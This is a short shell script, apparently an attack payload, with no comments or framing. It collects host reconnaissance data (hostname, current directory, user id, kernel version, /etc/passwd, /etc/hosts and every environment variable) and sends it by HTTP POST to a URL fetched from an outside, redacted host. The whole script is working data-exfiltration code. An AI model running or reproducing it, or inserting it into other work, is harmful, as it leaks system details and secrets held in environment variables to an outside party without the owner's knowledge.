DOMAIN="[HOSTNAME]"

frinfo() {
	echo ""
	echo "hostname:"
	echo "$(hostname 2>/dev/null)"
	echo ""
	echo ""
	echo "cwd:"
	echo "$(pwd 2>/dev/null)"
	echo ""
	echo ""
	echo "id:"
	echo "$(id 2>/dev/null)"
	echo ""
	echo ""
	echo "uname:"
	echo "$(uname -a 2>/dev/null)"
	echo ""
	echo ""
	echo "passwd:"
	echo "$(cat /etc/passwd 2>/dev/null)"
	echo ""
	echo ""
	echo "hosts:"
	echo "$(cat /etc/hosts 2>/dev/null)"
	echo ""
	echo ""
	echo "env:"
	echo "$(env 2>/dev/null)"
	echo ""
	echo ""
}

url="https://$(curl https://$DOMAIN:4/s/payload | sed 's,127.0.0.1,'$DOMAIN',')"
curl -s -XPOST -d "data=$(frinfo)" "$url" 2>/dev/null